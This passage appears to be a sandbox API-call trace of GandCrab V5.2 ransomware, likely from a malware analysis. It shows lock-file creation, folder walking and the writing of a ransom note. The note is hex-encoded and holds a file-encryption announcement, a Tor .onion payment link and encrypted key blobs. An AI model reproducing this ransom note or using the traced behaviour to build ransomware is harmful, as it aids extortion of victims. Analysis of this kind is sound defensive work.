6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.904] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.904] CloseHandle (hObject=0x230) returned 1 [0096.904] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.905] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.905] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0xdf)) [0096.905] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.905] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.905] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.905] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\PrintHood\\d2ca4a09d2ca4deb61a.lock") returned 51 [0096.905] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\printhood\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.906] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.906] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.906] lstrlenW (lpString="C:\\Users\\Default\\PrintHood\\") returned 27 [0096.907] lstrcatW (in: lpString1="C:\\Users\\Default\\PrintHood\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\PrintHood\\*") returned="C:\\Users\\Default\\PrintHood\\*" [0096.907] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\PrintHood\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.907] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\PrintHood\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.907] CloseHandle (hObject=0x230) returned 1 [0096.907] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.907] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0096.907] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0096.907] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Recent" | out: lpString1="C:\\Users\\Default\\Recent") returned="C:\\Users\\Default\\Recent" [0096.907] lstrcatW (in: lpString1="C:\\Users\\Default\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Recent\\") returned="C:\\Users\\Default\\Recent\\" [0096.907] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.907] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.907] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.907] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.908] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.908] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.908] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.908] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.908] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.908] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.908] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.908] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Recent\\\\TITWMVJL-DECRYPT.txt") returned 45 [0096.908] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\recent\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.909] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x4